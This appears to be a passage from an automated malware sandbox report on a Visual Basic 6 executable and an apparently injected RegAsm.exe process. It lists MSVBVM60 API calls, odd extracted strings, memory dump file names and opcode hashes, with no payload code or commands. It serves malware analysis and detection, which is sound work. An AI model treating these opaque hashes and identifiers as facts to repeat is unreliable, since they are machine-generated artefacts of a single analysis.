__vbaObjSet.MSVBVM60(?,00000000), ref: 00412AB9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412074,00000138), ref: 00412B0A
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00412B35
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412B6F
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412064,00000170), ref: 00412BBD
__vbaVarDup.MSVBVM60 ref: 00412BFE
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00412CC0
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,004011E6), ref: 00412CD6
__vbaVarAdd.MSVBVM60(?,00000002,?), ref: 00412D09
__vbaVarMove.MSVBVM60 ref: 00412D14
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00412D34
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412D6E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412064,00000060), ref: 00412DB9
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00412DE4
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412E1E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412064,00000050), ref: 00412E66
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00412E91
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412ECB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412074,00000130), ref: 00412F19
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00412F44
__vbaObjSet.MSVBVM60(?,00000000), ref: 00412F7E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412064,00000088), ref: 00412FCF
__vbaStrMove.MSVBVM60 ref: 0041306B
__vbaChkstk.MSVBVM60(0A951920,0000493A,00000003,?,?), ref: 004130A9
__vbaChkstk.MSVBVM60(004B3E59,0A951920,0000493A,00000003,?,?), ref: 004130DD
__vbaFreeStr.MSVBVM60 ref: 00413135
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 0041314D
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041316A
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 0041318D
__vbaObjSet.MSVBVM60(?,00000000), ref: 004131C7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412064,000000F8), ref: 00413215
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00413239
__vbaI4Var.MSVBVM60(?,?), ref: 00413261
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413296
__vbaFreeVar.MSVBVM60 ref: 004132A2
__vbaVarTstLt.MSVBVM60(00008003,?), ref: 004132CE
__vbaOnError.MSVBVM60(000000FF), ref: 004132E9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E80,00000288), ref: 0041332F
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00413353
__vbaI4Var.MSVBVM60(00000000), ref: 0041335D
__vbaFreeObj.MSVBVM60 ref: 00413369
__vbaFreeVar.MSVBVM60 ref: 00413372
__vbaFreeStr.MSVBVM60 ref: 004133A5
__vbaFreeStr.MSVBVM60(0041341D), ref: 0041340D
__vbaFreeVar.MSVBVM60 ref: 00413416

Strings

alkoxy, xrefs: 00412C5C
:I, xrefs: 00412FFB
54, xrefs: 00412FE7
COGNITIONS, xrefs: 00413108
,nA, xrefs: 0041277E
foldevg, xrefs: 00413018
Nerveroot, xrefs: 00412BDE

Memory Dump Source

Source File: 00000000.00000002.731997637.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.731992004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.732011734.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$List$Chkstk$Move$CallLate$Error
String ID: ,nA$54$:I$COGNITIONS$Nerveroot$alkoxy$foldevg
API String ID: 2141833910-582225477
Opcode ID: 401291e9c3e9288ee2c9cd61524ebb245e00333da221ba19bd4c4a62b60873c9
Instruction ID: 9a30b800f769ccf094b6bb3fc6e8cd4766867cf4f770af113b0833a10a262a04
Opcode Fuzzy Hash: 401291e9c3e9288ee2c9cd61524ebb245e00333da221ba19bd4c4a62b60873c9
Instruction Fuzzy Hash: 24821A74900219DFDB24DF90CD88BDABBB5BF48300F1081EAE64AAB250D7B45AC5DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00413B40, Relevance: 105.4, APIs: 50, Strings: 10, Instructions: 434COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00413BAD
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00413BC6
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413BDF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412064,00000050), ref: 00413C00
#645.MSVBVM60(?,00000000), ref: 00413C1C
__vbaStrMove.MSVBVM60 ref: 00413C27
__vbaFreeObj.MSVBVM60 ref: 00413C36
__vbaFreeVar.MSVBVM60 ref: 00413C3B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E80,00000218), ref: 00413C75
__vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 00413CC8
__vbaObjVar.MSVBVM60(00000000), ref: 00413CCE
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00413CD9
__vbaFreeObj.MSVBVM60 ref: 00413CE2
__vbaFreeVar.MSVBVM60 ref: 00413CE7
__vbaLateMemSt.MSVBVM60(?,Caption), ref: 00413D22
__vbaLateMemSt.MSVBVM60(?,Left), ref: 00413D53
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00413D68
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413D81
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412064,000000A0), ref: 00413DB5
__vbaLateMemSt.MSVBVM60(?,Top), ref: 00413DF0
__vbaFreeObj.MSVBVM60 ref: 00413DF5
__vbaLateMemSt.MSVBVM60(?,Visible), ref: 00413E24
__vbaLateMemCallLd.MSVBVM60(?,?,Caption,00000000), ref: 00413E43
__vbaVarTstEq.MSVBVM60(00008008,00000000), ref: 00413E4D
__vbaFreeVar.MSVBVM60 ref: 00413E59
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00413E77
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413E96
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412064,00000108), ref: 00413EB9
#580.MSVBVM60(?,00000001), ref: 00413EC5
__vbaFreeStr.MSVBVM60 ref: 00413ECE
__vbaFreeObj.MSVBVM60 ref: 00413ED7
__vbaVarDup.MSVBVM60 ref: 00413EF5
#528.MSVBVM60(?,?), ref: 00413F03
__vbaVarTstNe.MSVBVM60(?,?), ref: 00413F25
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00413F38
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00413F5D
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413F76
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412074,00000138), ref: 00413FA2
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00413FBF
__vbaObjSet.MSVBVM60(?,00000000), ref: 00413FD8
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412064,00000178), ref: 00413FFB
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00414009
__vbaFpI4.MSVBVM60 ref: 0041401D
__vbaI4Var.MSVBVM60(?,00000000), ref: 00414028
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E80,000002C8), ref: 0041407F
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0041408F
__vbaFreeVar.MSVBVM60 ref: 0041409B
__vbaFreeStr.MSVBVM60(004140F8), ref: 004140E7
__vbaFreeObj.MSVBVM60 ref: 004140EC
__vbaFreeStr.MSVBVM60 ref: 004140F5

Strings

Top, xrefs: 00413DE7
Visible, xrefs: 00413E1B
Bigwiggedness1, xrefs: 00413D0B
JENHJDERNE, xrefs: 00413C55
H!A, xrefs: 00413C88, 00413DD8
Caption, xrefs: 00413D19, 00413E2B
VB.CheckBox, xrefs: 00413C4B
laboratorieplanlgning, xrefs: 00413E35
Add, xrefs: 00413CBE
Left, xrefs: 00413D4A

Memory Dump Source

Source File: 00000000.00000002.731997637.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.731992004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.732011734.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultLate$New2$Call$List$#528#580#645AddrefCopyMove
String ID: Add$Bigwiggedness1$Caption$H!A$JENHJDERNE$Left$Top$VB.CheckBox$Visible$laboratorieplanlgning
API String ID: 2919225322-234214364
Opcode ID: fb88f2f0db737ca5cae6dad521bdb9d62fde1153a73b1bab1afe2869d948113f
Instruction ID: 18a25857b712b445ab7a65af36afe6b6f2a987d8f05ca2759a3dac25249ea77d
Opcode Fuzzy Hash: fb88f2f0db737ca5cae6dad521bdb9d62fde1153a73b1bab1afe2869d948113f
Instruction Fuzzy Hash: C5022C71E00209AFCB14DFA8D988ADEBBB8FF48700F10856AE549F7251D7749985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00413900, Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

#541.MSVBVM60(?,2:2:2), ref: 00413964
__vbaStrVarMove.MSVBVM60(?), ref: 0041396E
__vbaStrMove.MSVBVM60 ref: 00413979
__vbaFreeVar.MSVBVM60 ref: 00413988
__vbaI4Str.MSVBVM60(00412124), ref: 0041398F
#698.MSVBVM60(?,00000000), ref: 0041399A
__vbaVarTstNe.MSVBVM60(?,?), ref: 004139B6
__vbaFreeVar.MSVBVM60 ref: 004139C2
__vbaNew2.MSVBVM60(00412044,00416E2C), ref: 004139DB
__vbaHresultCheckObj.MSVBVM60(00000000,020CECFC,00412034,00000048), ref: 00413A02
__vbaStrMove.MSVBVM60 ref: 00413A11
__vbaVarDup.MSVBVM60 ref: 00413A2C
#545.MSVBVM60(?,?), ref: 00413A3A
__vbaVarTstNe.MSVBVM60(?,?), ref: 00413A58
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00413A6B
__vbaNew2.MSVBVM60(00412044,00416E2C), ref: 00413A8B
__vbaObjVar.MSVBVM60(?), ref: 00413A9D
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00413AA8
__vbaHresultCheckObj.MSVBVM60(00000000,020CECFC,00412034,00000010), ref: 00413AC2
__vbaFreeObj.MSVBVM60 ref: 00413ACB
__vbaFreeVar.MSVBVM60(00413B1C), ref: 00413B05
__vbaFreeStr.MSVBVM60 ref: 00413B14
__vbaFreeStr.MSVBVM60 ref: 00413B19

Strings

2:2:2, xrefs: 0041393A
8/8/8, xrefs: 00413A22

Memory Dump Source

Source File: 00000000.00000002.731997637.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.731992004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.732011734.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresultNew2$#541#545#698AddrefList
String ID: 2:2:2$8/8/8
API String ID: 889502001-2856156558
Opcode ID: 8bf4c1a230bc28fdb3e99458c5eb20776dbc50a4864120995c01ca542e0bca11
Instruction ID: 56cd25dbcc68cb80531950691e193c5a01836d973c36fa30c71fb9dfbfecf83d
Opcode Fuzzy Hash: 8bf4c1a230bc28fdb3e99458c5eb20776dbc50a4864120995c01ca542e0bca11
Instruction Fuzzy Hash: 5A513C75C00259AFCB14DFE4DA489DEBBB8FB48B01F20812AF541B7164D7B46A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00401378, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040137D

Strings

VB5!6&*, xrefs: 00401378

Memory Dump Source

Source File: 00000000.00000002.731997637.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.731992004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.732011734.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 587dc4e6eae8b0a47dad7353c7b5665742ce91263696a89bd56bfbc3126b4a5f
Instruction ID: 36de92583f0f4540cbc1b87272713629596a73bfc454abba596ad94def757781
Opcode Fuzzy Hash: 587dc4e6eae8b0a47dad7353c7b5665742ce91263696a89bd56bfbc3126b4a5f
Instruction Fuzzy Hash: 1651A6A244E7D10ED3138774992A6827FB1AE43224B1E89EBC4C1CF1F3E259591ED366

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402BF2, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.731997637.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.731992004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.732011734.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e78ede042b23a5743f1f10722ce3047ffaa05f1e393ee9576e982fc8c890039
Instruction ID: 16ed1cff12d85a54a5ffd84d0bf7ec3e9b630774f3fb68f3a8e13fb1603cba79
Opcode Fuzzy Hash: 3e78ede042b23a5743f1f10722ce3047ffaa05f1e393ee9576e982fc8c890039
Instruction Fuzzy Hash: B00142315181F08FCF52CB78C8D46027BB1AF1F30030658D5C8406F059C2607810EB53

Uniqueness

Uniqueness Score: -1.00%

Function 00413440, Relevance: 36.8, APIs: 19, Strings: 2, Instructions: 99COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 0041348C
__vbaVarDup.MSVBVM60 ref: 0041349E
__vbaVarDup.MSVBVM60 ref: 004134A6
#671.MSVBVM60(00000000,00000000,00000000,40000000,00000000,40000000), ref: 004134B6
__vbaFpR8.MSVBVM60 ref: 004134BC
__vbaVarDup.MSVBVM60 ref: 004134E3
#667.MSVBVM60(?), ref: 004134E9
__vbaStrMove.MSVBVM60 ref: 004134F4
__vbaFreeVar.MSVBVM60 ref: 004134FD
#541.MSVBVM60(?,2:2:2), ref: 0041350C
__vbaStrVarMove.MSVBVM60(?), ref: 00413516
__vbaStrMove.MSVBVM60 ref: 00413521
__vbaFreeVar.MSVBVM60 ref: 0041352A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E80,00000254), ref: 0041354F
__vbaFreeStr.MSVBVM60(0041358D), ref: 00413570
__vbaFreeStr.MSVBVM60 ref: 00413575
__vbaFreeVar.MSVBVM60 ref: 00413580
__vbaFreeStr.MSVBVM60 ref: 00413585
__vbaFreeVar.MSVBVM60 ref: 0041358A

Strings

Velbaaren, xrefs: 004134D5
2:2:2, xrefs: 00413503

Memory Dump Source

Source File: 00000000.00000002.731997637.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.731992004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.732011734.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#541#667#671CheckCopyHresult
String ID: 2:2:2$Velbaaren
API String ID: 504220352-936174853
Opcode ID: 95cb0d1fafc41ef2619864f57bf11946c11aa923cc6338b6046fcc8bf8873990
Instruction ID: 7f2024e4787983c2c72fff763ff8637ff64ea32c42f3dd913faa1f597dd44013
Opcode Fuzzy Hash: 95cb0d1fafc41ef2619864f57bf11946c11aa923cc6338b6046fcc8bf8873990
Instruction Fuzzy Hash: 75411A71C00249EBCB04DFA5DE49ADEBBB8FF94705F10812AE542B7164DB742A89CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00413700, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,004011A8,00411E80,00000190), ref: 0041377D
__vbaLateIdCallLd.MSVBVM60(?,?,00000005,00000000), ref: 00413792
__vbaI4Var.MSVBVM60(00000000), ref: 0041379C
__vbaFreeObj.MSVBVM60 ref: 004137A5
__vbaFreeVar.MSVBVM60 ref: 004137AE
__vbaVarDup.MSVBVM60 ref: 004137D3
#629.MSVBVM60(?,?,00000001,?), ref: 004137E7
__vbaVarTstNe.MSVBVM60(?,?), ref: 0041380C
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00413823
#570.MSVBVM60(000000C8), ref: 00413836
__vbaNew2.MSVBVM60(00412044,00416E2C), ref: 0041384E
__vbaHresultCheckObj.MSVBVM60(00000000,020CECFC,00412034,00000014), ref: 00413873
__vbaHresultCheckObj.MSVBVM60(00000000,?,00412054,000000B8), ref: 0041389C
__vbaFreeObj.MSVBVM60 ref: 004138A1

Strings

FGFG, xrefs: 004137C5

Memory Dump Source

Source File: 00000000.00000002.731997637.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.731992004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.732011734.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$#570#629CallLateListNew2
String ID: FGFG
API String ID: 3758171355-2759163656
Opcode ID: d55812cd91e9917a0fcda835aabe2b3c6f3c6a8660cc9d2ea3070f2335b380c2
Instruction ID: d87815c658c2dad4199243f7e782f0607a04291ad26b71d69f355b84a3dfbf92
Opcode Fuzzy Hash: d55812cd91e9917a0fcda835aabe2b3c6f3c6a8660cc9d2ea3070f2335b380c2
Instruction Fuzzy Hash: 98515B71901248AFDB10DFA5CE48EDEBBB8EF58704F20805AF245B7260D7B45A45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 004135B0, Relevance: 12.1, APIs: 8, Instructions: 94COMMON

Download Yara Rule

APIs

__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E80,00000048), ref: 00413609
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011E6), ref: 0041361C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411E80,0000015C), ref: 0041363F
__vbaNew2.MSVBVM60(004103D0,00415010), ref: 00413654
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041366D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00412064,000001C8), ref: 004136B0
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011E6), ref: 004136B5
__vbaFreeStr.MSVBVM60(004136DF), ref: 004136D8

Memory Dump Source

Source File: 00000000.00000002.731997637.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.731992004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.732011734.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.732019072.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$MoveNew2
String ID:
API String ID: 3514808224-0
Opcode ID: d87dbb606a1a0c4f6e03304b5f417e4f32efae94b7e5c27f8bd5b3cfe4fab5fa
Instruction ID: 5a87d75efa5546bc7c501924ef1b2aef0fdeeba81423c64e53b9d0860931ea7d
Opcode Fuzzy Hash: d87dbb606a1a0c4f6e03304b5f417e4f32efae94b7e5c27f8bd5b3cfe4fab5fa
Instruction Fuzzy Hash: E0314370A40204EBCB14DF94CD89EDABBB8FF58701F10452AE645FB250D7789985CB99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6228 Parent PID: 904 RegAsm.exeCOMMON

Executed Functions

Function 02A201C8, Relevance: 2.1, Strings: 1, Instructions: 825COMMON

Download Yara Rule

Strings

X1(r, xrefs: 02A205A2

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID: X1(r
API String ID: 0-3909273932
Opcode ID: a82f3a944e728d20338c7beb1580039798872d6b098c7750b02d4fef4fb2eeb3
Instruction ID: c82feead4301e07e9086726549e39ebb31d28159d6f12641d955bc315da9b4c2
Opcode Fuzzy Hash: a82f3a944e728d20338c7beb1580039798872d6b098c7750b02d4fef4fb2eeb3
Instruction Fuzzy Hash: 4E626A70600255CFCB15DF68C580B6ABBF2FF98304F2485A8D9469B3A6DB35ED45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02A21540, Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

X1(r, xrefs: 02A21564

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID: X1(r
API String ID: 0-3909273932
Opcode ID: 8e1585e4534c54db105e4397ba95a13762d08e5792270c8000fa3573188c08ab
Instruction ID: 13628cf0d2eaff75ddf65c0c100d10fbc725d2066f26524691292ec69d39c6af
Opcode Fuzzy Hash: 8e1585e4534c54db105e4397ba95a13762d08e5792270c8000fa3573188c08ab
Instruction Fuzzy Hash: 06F0A071A081945FDB118BADA884AFBBFF8EFC6254B14016EE009D3252C5728C018760

Uniqueness

Uniqueness Score: -1.00%

Function 02A21550, Relevance: 1.3, Strings: 1, Instructions: 27COMMON

Download Yara Rule

Strings

X1(r, xrefs: 02A21564

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID: X1(r
API String ID: 0-3909273932
Opcode ID: b1dc3cd745c49859ed2e8069fdc7114f36aa2e611ef104c96aabded6fdbae923
Instruction ID: 4c3af7dfab80846d9440b39e25f9c49f18238215f164395c9e973d398ed37e04
Opcode Fuzzy Hash: b1dc3cd745c49859ed2e8069fdc7114f36aa2e611ef104c96aabded6fdbae923
Instruction Fuzzy Hash: 92E09A32604214AF87149BAEE8848BBBBECEBC92A0710017AE108C3350DA72AC0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 02A20E40, Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccfaa4f53e1bcd3dedd911ddf658dd09bdf6cb99591d21ebfe416092d97d63d2
Instruction ID: 4b4e88b2f8c168010ab065c6296b0f057ebbc6af6d0539ea6926d76c4249c0d3
Opcode Fuzzy Hash: ccfaa4f53e1bcd3dedd911ddf658dd09bdf6cb99591d21ebfe416092d97d63d2
Instruction Fuzzy Hash: 76021D347002118FCB64DF2CD994A2977E3FB88344B258164E9099F7A6DF7AED46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A20E30, Relevance: .3, Instructions: 297COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536c2af96a815dbde4a778faef7e038d40d5bfe5fe2718c21c1a3f95c78f3838
Instruction ID: 31ba3760269c14ac259473307f5c96946156d57e974ecfc2291bd9055ed7282f
Opcode Fuzzy Hash: 536c2af96a815dbde4a778faef7e038d40d5bfe5fe2718c21c1a3f95c78f3838
Instruction Fuzzy Hash: AFC10D347002518FCB64DF28D984E297BE3FB58344B258164E9099FBA6DF7ADC06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A201B7, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a94ed1da6d03e9dce8517f682089a8d3dce15a0e9585638305f063b613cb06b6
Instruction ID: 338a9688727de36628645c35e80130d08dc695ba5a6c37ee2aa3aaba374b2756
Opcode Fuzzy Hash: a94ed1da6d03e9dce8517f682089a8d3dce15a0e9585638305f063b613cb06b6
Instruction Fuzzy Hash: 59318F747001419FDB14AFBDC99076EBAE7FF88340F60807C9509A7396EA3A9D15CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02A200B9, Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f92b51ca1c17d0f8f8376b17ae9418173d8554c83de81fcb1c297d115d18542
Instruction ID: 6f5385755d162e2236cf2dff930643fc6b2992ed0613fdbc3b76e93e79d98735
Opcode Fuzzy Hash: 7f92b51ca1c17d0f8f8376b17ae9418173d8554c83de81fcb1c297d115d18542
Instruction Fuzzy Hash: 25212A307053508FCB59AB7DC068B6E3BE6AF85305B2141B9D406CB7A6DE3ACC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02A200C8, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d4c23641d909b2d2ba3ff803d46e6824ef68433f2824053b4fa661e682294a
Instruction ID: f776faa65d0799dac2f15b09957fa3a3e95e8106da70a16862ffe964d6700512
Opcode Fuzzy Hash: 64d4c23641d909b2d2ba3ff803d46e6824ef68433f2824053b4fa661e682294a
Instruction Fuzzy Hash: 6A21F8307002149FCB59AB7DC058B6E3AE6AF85305B2141B8D406CB7AADE7ADC458B91

Uniqueness

Uniqueness Score: -1.00%

Function 02A20007, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c61fa56204445aed4e9d3bc0c38f6e8c7e6e104d01817004e19b7141f5aebbd
Instruction ID: d351239581267673ba0fa378019e75ef2ffce617de4219eae2774f2dcc9d1c19
Opcode Fuzzy Hash: 2c61fa56204445aed4e9d3bc0c38f6e8c7e6e104d01817004e19b7141f5aebbd
Instruction Fuzzy Hash: 2611576150E3C29FC7078BB45C785A5BFB19E83110B1E45EFD4C5DB0E3E6280A49C762

Uniqueness

Uniqueness Score: -1.00%

Function 02A20D38, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8469432228b159b1bef3b98fbd0cce18e9bbd260ab01accacff7ae6030194f9f
Instruction ID: b2d83b845ded0876397f62f747dbdd2833f1b2a3a72d23ee7604148e7a0b09a9
Opcode Fuzzy Hash: 8469432228b159b1bef3b98fbd0cce18e9bbd260ab01accacff7ae6030194f9f
Instruction Fuzzy Hash: 6601D231A042585FCB15EBB998115AD7FB5EF89310F14C0AAD50ADB392CE358E06C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02A20CB0, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e048c17dd53f5e30de647672712d808229bdfdf8446547da24b02c8bab1e0aaa
Instruction ID: d1ab46bbbd3ba798928c1fa1ffe29d129c5dfb4374660c96aa540905e44ced2b
Opcode Fuzzy Hash: e048c17dd53f5e30de647672712d808229bdfdf8446547da24b02c8bab1e0aaa
Instruction Fuzzy Hash: 0BF0A4717083541FD70A66BD58106BF6FE6DBC6310B11407ED409DB356DC754D028360

Uniqueness

Uniqueness Score: -1.00%

Function 02A20CC0, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9344dd369c79c573b1af4bbfa50a49cd18ff35073f8196b486381842b27af4b
Instruction ID: e2502716afd8d233f1a786ad60d3617af0f35499675cdcac7b8c16894ed8b948
Opcode Fuzzy Hash: c9344dd369c79c573b1af4bbfa50a49cd18ff35073f8196b486381842b27af4b
Instruction Fuzzy Hash: A6F082717043141BD70966BEAC1067F7ADFDBC9754B10403DE509D7356DD758D0182B0

Uniqueness

Uniqueness Score: -1.00%

Function 02A214E8, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.736224094.0000000002A20000.00000040.00000001.sdmp, Offset: 02A20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 833aacb0699e5ac029dcb03b93c9aa89208d5ad80261c3266f285e0660170440
Instruction ID: ca9eb07fd8c5707c00b702bbd4bbe2f8d018bf54c0ea9be6404691a0a886b139
Opcode Fuzzy Hash: 833aacb0699e5ac029dcb03b93c9aa89208d5ad80261c3266f285e0660170440
